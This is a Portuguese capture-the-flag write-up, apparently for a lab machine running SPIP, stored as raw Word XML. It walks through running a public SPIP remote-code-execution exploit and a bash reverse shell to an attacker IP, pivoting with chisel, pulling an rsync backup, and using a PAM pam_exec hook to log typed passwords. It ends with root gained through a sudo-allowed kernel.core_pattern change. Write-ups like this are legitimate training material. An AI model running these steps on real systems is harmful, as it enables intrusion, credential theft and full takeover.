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wqimp56c687t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qsw8uvkmwc2v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Pipe.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lg0s3a59tsxs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realizado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máquina para identificar quais portas estavam abertas.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 -p- --open --min-rate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 -sVC -vvv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06700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Foram identificadas as portas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8889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abertas. Na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8889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havia uma aplicação web, que foi acessada para análise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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09900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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aplicação, foi identificado na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URI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spip.php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17700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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spip.php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faz parte do próprio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framework SPIP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sendo um componente padrão do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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hyperlink r:id="rId11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https://git.spip.net/spip/spip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SPIP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um projeto open source, foi possível acessar alguns arquivos da aplicação, como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htaccess.txt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33700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Recentemente, foi descoberta uma vulnerabilidade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Remote Code Execution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nesse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framework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exploit público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disponibilizado pelo Chocapikk no GitHub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 clone https: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//github.com/Chocapikk/CVE-2025-71243</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 exploit.py -u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'http://&lt;MACHINE-IP&gt;:8889/spip.php?page=contact'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--check</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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84713"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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7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executar o exploit, foi possível explorar a vulnerabilidade presente na aplicação.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 exploit.py -u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'http://&lt;MACHINE-IP&gt;:8889/spip.php?page=contact'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 ‘id’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95400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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obter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payload foi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codificado em base64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Em seguida, o conteúdo foi gravado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/tmp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máquina alvo e executado. Após a execução, foi estabelecida a conexão reversa na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#/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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/bin/bash -c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 -i &gt;&amp; /dev/tcp/&lt;VPN-IP&gt;/443 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 exploit.py -u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'http://&lt;MACHINE-IP&gt;:8889/spip.php?page=contact'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'echo "&lt;YOUR-TOKEN&gt;" | base64 -d &gt; /tmp/a.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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 exploit.py -u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'http://&lt;MACHINE-IP&gt;:8889/spip.php?page=contact'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'bash /tmp/a.sh'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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68400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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95400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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98600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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9dyweuiviurq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estabelecer a conexão reversa, foi obtida uma shell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TTY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interativa.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script /dev/null -c bash</w:t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ctr+z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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stty raw -echo;fg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25400" l="25400" r="25400" t="2540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analisar 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identificado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.dockerenv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indicando que o ambiente em execução é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container Docker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403600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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baixado para a máquina um </w:t>
      </w:r>
      <w:hyperlink r:id="rId20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binário estático do Nmap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realizar um scan de rede interno para identificar outros hosts acessíveis a partir do container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&lt;machine-ip&gt;/nmap -o nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;machine-ip&gt;/nmap-services -o nmap-services</w:t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33600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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71700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Rule="auto"/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foram identificados mais dois hosts na rede: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172.18.0.1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referente ao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Docker host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172.18.0.3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outro host presente na rede interna.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./nmap -sn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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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28800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Docker host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172.18.0.1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foram identificadas as portas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873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889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abertas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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jc w:val="both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NMAPDIR=. ./nmap -p-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4D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32000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Rule="auto"/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host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172.18.0.3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identificado apenas o serviço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MySQL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em execução na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3306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NMAPDIR=. ./nmap -p-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52600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Docker host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identificada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873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aberta, que corresponde à porta padrão do serviço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rsync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utilizado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backup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sincronização de arquivos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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foi realizado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 forwarding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desse serviço para a máquina do atacante utilizando o </w:t>
      </w:r>
      <w:hyperlink r:id="rId26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chisel</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId2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&lt;VPN-IP&gt;/chisel -o chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058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./chisel client &lt;VPN-IP&gt;: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873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873</w:t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77900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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chisel server -p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--reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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95400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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conexão estabelecida, foi possível listar os diretórios e arquivos disponíveis no serviço. Em seguida, foi realizado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download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backup.zip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continha a senha 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marcus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rsync -d rsync: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//127.0.0.1/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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rsync -d rsync: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//127.0.0.1/backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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rsync -d rsync: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//127.0.0.1/backup/backup.zip .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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25700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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60888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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8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senha 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marcus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autenticar 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aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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929237"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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923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analisar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/etc/passwd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identificar alguns usuários presentes no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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16000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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listar as permissões do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/etc/pam.d/common-auth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identificado que havia permissão de escrita nesse arquivo. Esse arquivo faz parte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responsável por centralizar e controlar os métodos de autenticação de usuários no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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/etc/pam.d/common-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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12800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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permissão de escrita nesse arquivo, foi possível configurar para que, sempre que um usuário se autentique utilizando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um script localizado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/dev/shm/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seja executado, permitindo capturar a senha inserida durante a autenticação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A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auth [success=ok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=ignore] pam_succeed_if.so user = sys_admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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auth optional pam_exec.so expose_authtok /dev/shm/teste.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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38200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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script localizado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/dev/shm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executado, permitindo capturar a senha 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svc_backup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Com essas credenciais, foi possível autenticar e acessar a conta deste usuário.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082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PASSWORD=$(cat)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083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 -n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"$PASSWORD"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 then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085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echo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"Data: $(date) | User: $PAM_USER | Pass: $PASSWORD"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&gt;&gt; /tmp/passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087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jc w:val="both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8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14500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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senha obtida, foi possível autenticar na máquina utilizando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svc_backup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65200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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do usuário se encontra no diretório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/home/svc_backup/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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874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3wki32x4tycc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sudo -l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verificar quais comandos o usuário pode executar sem a necessidade de senha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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00100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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identificado que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svc_backup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pode executar,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sem senha,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/sbin/sysctl kernel.core_pattern=*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95300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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vez de manter o comando padrão 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core_pattern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configurá-lo para executar um script controlado. Esse script definia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binário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que ele fosse executado com privilégios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 execução do processo que gerava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core dump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passou a poder ser executado com privilégios elevados, possibilitando o acesso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 &gt; /tmp/pwn.sh &lt;&lt;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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2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chmod +s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4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sysctl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"kernel.core_pattern=|/tmp/pwn.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5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sleep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999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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6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kill -SIGSEGV $!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7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 -al /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8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05000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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 root 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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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12800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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43" w:type="default"/>
      <w:headerReference r:id="rId44" w:type="first"/>
      <w:headerReference r:id="rId45" w:type="even"/>
      <w:footerReference r:id="rId46" w:type="default"/>
      <w:footerReference r:id="rId47" w:type="first"/>
      <w:footerReference r:id="rId48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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6vrogorm36q9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2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F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4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8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05191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</w:t>
                          </w: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Pipe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05191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1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0519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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId45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hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chise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4.png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9.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git.spip.net/spip/spip" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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35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7JRX4AljWR3lDk5+HcajBJ9zWg==">CgMxLjAyDmgud3FpbXA1NmM2ODd0Mg5oLnFzdzh1dmttd2MydjIOaC5sZzBzM2E1OXRzeHMyDmguOWR5d2V1aXZpdXJxMg5oLjN3a2kzMng0dHljYzIOaC42dnJvZ29ybTM2cTk4AHIhMXZkZVg0TkF2ZXhvVE5CSkpZSzFOZjdWRkt4QXpLb1pO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